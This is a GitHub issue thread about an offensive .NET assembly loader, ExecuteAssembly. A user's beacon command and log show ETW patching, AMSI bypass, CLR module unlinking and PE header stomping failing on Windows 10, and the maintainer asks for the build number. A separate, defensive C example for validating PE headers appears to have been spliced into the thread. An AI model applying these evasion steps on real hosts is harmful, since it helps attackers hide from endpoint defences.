med0x2e / ExecuteAssembly

Load/Inject .NET assemblies by; reusing the host (spawnto) process loaded CLR AppDomainManager, Stomping Loader/.NET assembly PE DOS headers, Unlinking .NET related modules, bypassing ETW+AMSI, avoiding EDR hooks via NT static syscalls (x64) and hiding imports by dynamically resolving APIs (hash).

Execution fails when using '--stomp-headers' #3

Open A32AN opened 3 years ago

A32AN commented 3 years ago

Hi,

I'm seeing failures when using the "--stomp-headers" argument. I'm using the following command line: ExecuteAssembly --dotnetassembly /tmp/Seatbelt.exe --unlink-modules --etw --asmi --stomp-headers

Which results in something like this:

* Tasked beacon to run: @args
* Tasked beacon to spawn x86 features to: %windir%\SysWOW64\ScriptRunner.exe
* Tasked beacon to spawn x64 features to: %windir%\sysnative\ScriptRunner.exe
* Tasked beacon to spawn .NET Assembly /tmp/Seatbelt.exe'
[+] host called home, sent: 85 bytes
[+] host called home, sent: 480116 bytes
[+] received output:

[i]: .NET Assembly Length: 548352 bytes
[+]: Parsing Arguments :
[i]: Args count: 1
[+]: Base64 Decoding & Decompressing .NET Assembly...
[+]: Base64 Decoding & Decompressing Done.

[+]: Patching ETW...
[+]: Retrieving EtwEvenWrite Address from NTDLL...
[+]: NTDLL.DLL Module Base Address: 0xfeea0000
[+]: EtwEvenWrite Export located at Address: 0xfeef2d50
[+]: Patching EtwEvenWrite 0xfeef2d50
[+]: ETW Patchine Done.

[+]: Enumerating Loaded CLR versions
[+]: Scanning for any loaded modules with the name 'clr', 'mscoree'...
[+] Unlinking CLR related modules from PEB
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
[i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
[i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll
[i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll

[+]: Obtaining a handle of the current process: 820
[+]: Scanning for PE DOS Header 'MZ...' pattern...
[i]: 9 PE DOS Headers found.
[+]: Stomping 9 PE DOS headers:
[i]: Stomping MZ Header: 0xbfefeb80
[-]: Not a valid PE DOS Header
[i]: Stomping MZ Header: 0x10009ac0
[i]: Stomping MZ Header: 0x6a7a0009
[i]: Stomping MZ Header: 0x6a7c2ed9
[i]: Stomping MZ Header: 0x6a9e0000
[i]: Stomping MZ Header: 0x6aa03cd0
[i]: Stomping MZ Header: 0x6c50ccb0
[i]: Stomping MZ Header: 0x6c600000
[i]: Stomping MZ Header: 0x6cfd0080

[!] pMethodInfo->Invoke_3(...) failed, hr = 80131604
[!]: Something went wrong.

If I leave out the --stomp-headers it all works flawlessly. EDIT: If I switch to the PEB walking methods header stomping works fine
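The log above shows a raw 'MZ' byte-pattern scan reporting hits at addresses such as 0x6a7a0009 and 0x6a7c2ed9, which are not page-aligned and so cannot be image bases, alongside one explicit "Not a valid PE DOS Header" rejection. The following added example (not code from the ExecuteAssembly project) shows the validation a memory-forensics scanner applies to a candidate 'MZ' hit before treating it as a real PE image: DOS magic, an in-bounds e_lfanew, the "PE\0\0" signature and a page-aligned base. The sample image and the `is_valid_pe_header`/`build_sample` names are assumptions constructed for the demonstration.

```c
/* Added example: validate a candidate "MZ" hit the way a memory scanner
 * should, so stray "MZ" bytes in data are not mistaken for a PE image. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same values as the Windows SDK macros; defined here so this builds anywhere. */
#define DOS_SIGNATURE 0x5A4DU     /* "MZ" read little-endian */
#define NT_SIGNATURE  0x00004550U /* "PE\0\0" read little-endian */

/* buf/len: bytes read from the candidate address; base: that address.
 * Returns true only for a plausible PE image header. */
bool is_valid_pe_header(const uint8_t *buf, size_t len, uintptr_t base)
{
    if (base & 0xFFF)   /* image bases are page-aligned; 0x6a7c2ed9 is not */
        return false;
    if (len < 0x40)     /* IMAGE_DOS_HEADER is 64 bytes */
        return false;
    uint16_t e_magic;
    memcpy(&e_magic, buf, sizeof e_magic);
    if (e_magic != DOS_SIGNATURE)
        return false;
    int32_t e_lfanew;   /* offset of the NT headers, at DOS header offset 0x3C */
    memcpy(&e_lfanew, buf + 0x3C, sizeof e_lfanew);
    /* Must point past the DOS header and leave room for the 4-byte signature. */
    if (e_lfanew < 0x40 || (size_t)e_lfanew + 4 > len)
        return false;
    uint32_t pe_sig;
    memcpy(&pe_sig, buf + e_lfanew, sizeof pe_sig);
    return pe_sig == NT_SIGNATURE;
}

/* Constructed sample (assumption): a minimal synthetic header with "PE\0\0" at 0x80. */
uint8_t sample_image[0x100];

void build_sample(void)
{
    memset(sample_image, 0, sizeof sample_image);
    sample_image[0] = 'M';
    sample_image[1] = 'Z';
    int32_t lfanew = 0x80;
    memcpy(sample_image + 0x3C, &lfanew, sizeof lfanew);
    memcpy(sample_image + 0x80, "PE\0\0", 4);
}
```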

med0x2e commented 3 years ago

Interesting, which Windows version and build did you try the "syscall" version of ExecuteAssembly on?

A32AN commented 3 years ago

It's a 64 bit installation of Windows 10 Enterprise. Build number = 10.0.18363.0